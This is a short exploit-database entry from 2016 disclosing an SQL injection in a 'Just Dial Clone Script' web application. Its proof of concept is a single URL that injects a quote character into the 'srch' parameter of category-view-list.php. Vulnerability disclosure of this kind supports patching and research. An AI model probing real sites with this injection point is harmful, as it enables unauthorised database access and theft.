id: 25947
date: 10/21/2016
title: Just Dial Clone Script SQL Injection Vulnerability
author: Arbin Godar
cves: 

# Exploit Title: SQL Injection in Just Dial Clone Script
# Date: 20 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: http://www.i-netsolution.com/
 
*----------------------------------------------------------------------------------------------------------------------*
 
# Proof of Concept SQL Injection/Exploit :
http://localhost/[PATH]/category-view-list.php?srch=PoC%27

#  0day.today [2023-03-26]  #